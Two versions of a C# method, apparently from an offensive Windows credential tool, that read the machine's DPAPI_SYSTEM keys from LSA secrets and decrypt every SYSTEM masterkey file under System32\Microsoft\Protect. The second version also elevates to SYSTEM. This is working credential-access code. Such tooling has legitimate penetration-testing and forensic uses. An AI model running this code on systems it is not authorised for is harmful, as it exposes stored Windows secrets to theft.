public static Dictionary <string, string> TriageSystemMasterKeys(bool show = false) { // retrieve the DPAPI_SYSTEM key and use it to decrypt any SYSTEM DPAPI masterkeys Dictionary <string, string> mappings = new Dictionary <string, string>(); if (Helpers.IsHighIntegrity()) { // get the system and user DPAPI backup keys, showing the machine DPAPI keys // { machine , user } List <byte[]> keys = LSADump.GetDPAPIKeys(true); string systemFolder = String.Format("{0}\\Windows\\System32\\Microsoft\\Protect\\", Environment.GetEnvironmentVariable("SystemDrive")); string[] systemDirs = Directory.GetDirectories(systemFolder); foreach (string directory in systemDirs) { string[] machineFiles = Directory.GetFiles(directory); string[] userFiles = new string[0]; if (Directory.Exists(String.Format("{0}\\User\\", directory))) { userFiles = Directory.GetFiles(String.Format("{0}\\User\\", directory)); } foreach (string file in machineFiles) { if (Regex.IsMatch(file, @"[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}")) { string fileName = System.IO.Path.GetFileName(file); if (show) { Console.WriteLine("[*] Found SYSTEM system MasterKey : {0}", file); } byte[] masteyKeyBytes = File.ReadAllBytes(file); try { // use the "machine" DPAPI key Dictionary <string, string> mapping = Dpapi.DecryptMasterKeyWithSha(masteyKeyBytes, keys[0]); mapping.ToList().ForEach(x => mappings.Add(x.Key, x.Value)); } catch (Exception e) { Console.WriteLine("[X] Error triaging {0} : {1}", file, e.Message); } } } foreach (string file in userFiles) { if (Regex.IsMatch(file, @"[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}")) { string fileName = System.IO.Path.GetFileName(file); if (show) { Console.WriteLine("[*] Found SYSTEM user MasterKey : {0}", file); } byte[] masteyKeyBytes = File.ReadAllBytes(file); try { // use the "user" DPAPI key Dictionary <string, string> mapping = Dpapi.DecryptMasterKeyWithSha(masteyKeyBytes, keys[1]); mapping.ToList().ForEach(x => mappings.Add(x.Key, x.Value)); } catch (Exception e) { Console.WriteLine("[X] Error triaging {0} : {1}", file, e.Message); } } } } } else { Console.WriteLine("\r\n[X] Must be elevated to triage SYSTEM masterkeys!\r\n"); } return(mappings); }
public static Dictionary <string, string> TriageSystemMasterKeys(bool show = false) { // retrieve the DPAPI_SYSTEM key and use it to decrypt any SYSTEM DPAPI masterkeys var mappings = new Dictionary <string, string>(); if (Helpers.IsHighIntegrity()) { // get the system and user DPAPI backup keys, showing the machine DPAPI keys // { machine , user } var keys = LSADump.GetDPAPIKeys(true); Helpers.GetSystem(); var systemFolder = $"{Environment.GetEnvironmentVariable("SystemDrive")}\\Windows\\System32\\Microsoft\\Protect\\"; var systemDirs = Directory.GetDirectories(systemFolder); foreach (var directory in systemDirs) { var machineFiles = Directory.GetFiles(directory); var userFiles = new string[0]; if (Directory.Exists($"{directory}\\User\\")) { userFiles = Directory.GetFiles($"{directory}\\User\\"); } foreach (var file in machineFiles) { if (!Regex.IsMatch(file, @".*\\[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}")) { continue; } var fileName = Path.GetFileName(file); if (show) { Console.WriteLine("[*] Found SYSTEM system MasterKey : {0}", file); } var masteyKeyBytes = File.ReadAllBytes(file); try { // use the "machine" DPAPI key var plaintextMasterkey = Dpapi.DecryptMasterKeyWithSha(masteyKeyBytes, keys[0]); mappings.Add(plaintextMasterkey.Key, plaintextMasterkey.Value); } catch (Exception e) { Console.WriteLine("[X] Error triaging {0} : {1}", file, e.Message); } } foreach (var file in userFiles) { if (!Regex.IsMatch(file, @".*\\[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}")) { continue; } var fileName = Path.GetFileName(file); if (show) { Console.WriteLine("[*] Found SYSTEM user MasterKey : {0}", file); } var masteyKeyBytes = File.ReadAllBytes(file); try { // use the "user" DPAPI key var plaintextMasterKey = Dpapi.DecryptMasterKeyWithSha(masteyKeyBytes, keys[1]); mappings.Add(plaintextMasterKey.Key, plaintextMasterKey.Value); } catch (Exception e) { Console.WriteLine("[X] Error triaging {0} : {1}", file, e.Message); } } } } else { Console.WriteLine("\r\n[X] Must be elevated to triage SYSTEM masterkeys!\r\n"); } return(mappings); }